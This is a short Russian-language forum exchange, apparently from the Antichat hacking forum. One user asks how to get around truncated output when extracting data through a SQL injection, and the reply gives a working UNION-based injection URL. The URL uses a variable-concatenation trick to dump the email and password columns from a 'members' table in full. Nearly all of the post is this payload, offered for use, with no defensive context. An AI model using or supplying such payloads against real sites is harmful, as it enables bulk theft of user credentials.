09.08.2011, 00:48
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от mix0x0
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
Код:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
|
|
|